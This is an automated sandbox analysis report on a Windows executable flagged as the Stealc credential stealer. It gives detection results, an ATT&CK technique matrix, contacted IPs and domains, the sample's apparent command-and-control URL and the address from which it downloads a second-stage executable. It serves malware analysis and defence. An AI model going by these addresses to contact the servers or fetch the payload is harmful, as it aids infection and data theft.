                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: A865.tmp.exe PID: 3640, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: A865.tmp.exe PID: 3640, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A71B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00A71B53
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A70E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00A70E7D

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                  Native API                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		21
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		11
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Query Registry                  		Remote Desktop Protocol3
                  Clipboard Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Disable or Modify Tools                  		Security Account Manager31
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS11
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets11
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Software Packing                  		DCSync1
                  Account Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc Filesystem1
                  System Owner/User Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                  File and Directory Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing134
                  System Information Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  GK059kPZ5B.exe50%ReversingLabsWin32.Trojan.Generic
                  GK059kPZ5B.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\A865.tmp.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://upx.sf.net0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		172.67.179.207
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://62.204.41.177/edd20096ecef326d.phptrue
                      		unknown
                      https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                        		unknown
                        http://62.204.41.177/true
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://post-to-me.com/track_prt.php?sub=&cc=DEGK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                            		unknown
                            http://62.204.41.177/edd20096ecef326d.phpNA865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://post-to-me.com/track_prt.php?sub=GK059kPZ5B.exefalse
                                		unknown
                                http://176.113.115.37/ScreenUpdateSync.exeDTGK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://62.204.41.177/6A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://176.113.115.37/ScreenUpdateSync.exe)aGK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWAREGK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                        		unknown
                                        https://post-to-me.com/GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://upx.sf.netAmcache.hve.5.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://62.204.41.177iA865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://62.204.41.177/edd20096ecef326d.phpZA865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://62.204.41.177/edd20096ecef326d.php$A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://176.113.115.37/ScreenUpdateSync.exeGK059kPZ5B.exe, GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://62.204.41.177/edd20096ecef326d.phpfA865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://post-to-me.com/track_prt.php?sub=0&cc=DEeGK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://post-to-me.com/=GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://62.204.41.177A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmptrue
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          176.113.115.37
                                                          		unknownRussian Federation
                                                          		49505SELECTELRUfalse
                                                          62.204.41.177
                                                          		unknownUnited Kingdom
                                                          		30798TNNET-ASTNNetOyMainnetworkFItrue
                                                          172.67.179.207
                                                          		post-to-me.comUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1542871
                                                          Start date and time:2024-10-26 19:07:29 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 19s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:9
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:GK059kPZ5B.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:9883fdabd29a18139bd1cadedf550f35.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@4/7@1/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 50
                                                          • Number of non-executed functions: 378
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: GK059kPZ5B.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          13:08:32API Interceptor8739886x Sleep call for process: GK059kPZ5B.exe modified
                                                          13:10:03API Interceptor1x Sleep call for process: WerFault.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          176.113.115.37jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 176.113.115.37/ScreenUpdateSync.exe
                                                          62.204.41.1771vYjXDbKHt.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          716b3c89802c1713871667444720e62f3fc064c9910a1.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          oqIz1tfl5h.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php
                                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177/edd20096ecef326d.php

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          post-to-me.comjicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207
                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207
                                                          VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 172.67.179.207

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          SELECTELRUjicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                          • 176.113.115.37
                                                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                          • 92.53.102.17
                                                          TNNET-ASTNNetOyMainnetworkFI1vYjXDbKHt.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          716b3c89802c1713871667444720e62f3fc064c9910a1.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          oqIz1tfl5h.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                          • 62.204.41.177
                                                          CLOUDFLARENETUSZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                          • 188.114.96.3
                                                          jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 104.21.56.70
                                                          http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IGGet hashmaliciousUnknownBrowse
                                                          • 172.67.189.243
                                                          http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IGGet hashmaliciousUnknownBrowse
                                                          • 172.67.189.243
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                          • 104.21.95.91
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.170.64
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                          • 104.21.95.91
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207
                                                          ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 172.67.179.207
                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207
                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207
                                                          1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                          • 172.67.179.207
                                                          OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                          • 172.67.179.207
                                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                          • 172.67.179.207
                                                          H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                          • 172.67.179.207
                                                          factura Fvsae2400398241025.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 172.67.179.207
                                                          SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.179.207

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_A865.tmp.exe_6678317c8ae3237abe1e8f11d1632889f7f0bb9a_61c74afe_fc656f38-0a7f-4be7-885a-070ddb1037fe\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9644098237750152
                                                          Encrypted:false
                                                          SSDEEP:192:21369V0kVVShjMhZrMZtzuiFCZ24IO8p:I692kVVShjjTzuiFCY4IO8p
                                                          MD5:C787DC7CB04E2F06E1B23FFAC60519B8
                                                          SHA1:58E1065D21F5E8B423FEF14EAFC7AA320ABE8536
                                                          SHA-256:BEEC38894E806605384805C011C7143EFA250A2151E4367455584530F7AAA3CC
                                                          SHA-512:211B63C1ABD5CE821C12A057307CBAA61F0C38D95BBB405428926240699CE9C946D0F1D84E88B8B106F807926C9A8A6D4DFBA70B87B16359AFE0A89D343984DC
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.1.2.2.0.1.5.8.9.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.1.2.2.5.0.0.2.5.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.6.5.6.f.3.8.-.0.a.7.f.-.4.b.e.7.-.8.8.5.a.-.0.7.0.d.d.b.1.0.3.7.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.8.b.1.1.6.2.-.5.e.5.8.-.4.8.0.8.-.a.5.c.9.-.6.7.9.0.2.a.2.e.0.8.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.8.6.5...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.3.8.-.0.0.0.1.-.0.0.1.4.-.1.a.d.a.-.c.7.b.0.c.9.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.f.7.6.e.a.9.a.e.a.9.9.3.4.9.a.7.5.3.b.7.b.6.2.e.b.5.9.e.6.c.0.0.0.0.f.f.f.f.!.0.0.0.0.7.5.f.7.b.1.8.9.5.b.d.9.7.b.6.c.f.c.b.9.a.a.0.c.5.e.8.3.d.e.9.f.b.4.2.4.c.b.b.0.!.A.8.6.5...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9BD.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:08:42 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):60844
                                                          Entropy (8bit):1.928410118636886
                                                          Encrypted:false
                                                          SSDEEP:192:yqV4X+9o6KHZXWxOEOJwwereqAQb9NojnWVq+3XlpKKI0NBQMib6gZnHxoDrs:XhoxnEExeqqAQZajaSKI6piGghi0
                                                          MD5:AF3C88766784E6E16F8019610B9B9D49
                                                          SHA1:6FD33C3B61336456F3D312313AD4363685E93A9B
                                                          SHA-256:45731058F1010583A4C47F7671E7D24E27424AB94AF7D190FFD9FEF5CB8AD296
                                                          SHA-512:01F68B86B03B39A5FC725112B04659041FE289D3186695173C3EC50460E571FE13D58A359E99D2324196B5FFF50D9542C8B8784A6377E5FDBA9A9729070F53D3
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... ........".g............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T.......8....".g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAB8.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8308
                                                          Entropy (8bit):3.6977825699850184
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJ1v6Znb6Y7M6sWgmf3CcpDy89bzisf9xm:R6lXJd6Znb6YQ6lgmf3C6zhfi
                                                          MD5:0036F2EF58FB748215A332761743963B
                                                          SHA1:33A81E09733FD5A87EDDD76EC1680604005F8B62
                                                          SHA-256:C448F8F0E1754585816BD6BF0674F2F1032047194E399344FD1870A221C74B3D
                                                          SHA-512:D18396047E60D8D0B9D843C1306E0EB427757348F01C1F99CB54F6D1E4F5ABBAD3A1E0C584F688350262F19497D0C616061D80F5AA775B0B005FF7315CCCF372
                                                          Malicious:false
                                                          Reputation:low
